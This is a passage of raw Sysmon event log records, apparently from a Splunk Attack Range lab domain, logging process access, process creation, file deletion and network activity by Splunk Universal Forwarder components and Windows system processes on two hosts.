Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.727{5EBD8912-89EA-6151-1A7A-00000000FC01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.493{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EB2868A4071B7F96385DD7BCA8833E,SHA256=9A7C20F895E195AB5F8EB0401EF3BD871B1B7BDE20767BCABF4508A58974CA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:54.099{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0714814EBC5C3DCC3B210B21718BB6,SHA256=7A09F36612E1831AEE07C643F76C00D983EA7DD29AA6066E15E22F75F643C64B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.225{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.209{5EBD8912-89EA-6151-197A-00000000FC01}12086816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.060{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89EA-6151-197A-00000000FC01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.059{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.059{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.058{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.058{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89EA-6151-197A-00000000FC01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.058{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89EA-6151-197A-00000000FC01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:54.041{5EBD8912-89EA-6151-197A-00000000FC01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:50.831{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53301-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000978029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:51.838{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59334-false10.0.1.12-8000- 23542300x8000000000000000978028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:55.334{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24DCCB6E0A9DBB794DDE3F20E007543C,SHA256=7D5100EE24C350EEE37E37E03BC9D261FFBF621A73E34548786C44FB6CFE549B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.581{5EBD8912-89EB-6151-1B7A-00000000FC01}41124872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.512{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA020AF5EC0F0B5DD83FF903981ADBC,SHA256=6AB04D2F34408F8C2FE49A0A9D72ABFDB522639D8516FF98349FB262FCA146FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89EB-6151-1B7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-89EB-6151-1B7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.428{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89EB-6151-1B7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.413{5EBD8912-89EB-6151-1B7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:55.041{5EBD8912-89EA-6151-1A7A-00000000FC01}20044656C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.513{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34219E1D0A351124956C2C01BFAE3539,SHA256=D466332157E169E1D8E885A26D679CCBF913B5CCF3DDED98FA9F305BA10229D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:56.381{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BAF62612936F599B139ABB3EEF2F2C,SHA256=18314A2F435C8E39573374513E153FC17DA27CEDC9AB60CC0580A0FDABF41CCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.413{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D0B8087469A7D07733EB12E32624687,SHA256=2FF66A2BB0525A18914E5B289B99E92327748EE942350BAC1BF58D7F6C261030,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.013{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89EB-6151-1C7A-00000000FC01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:56.013{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 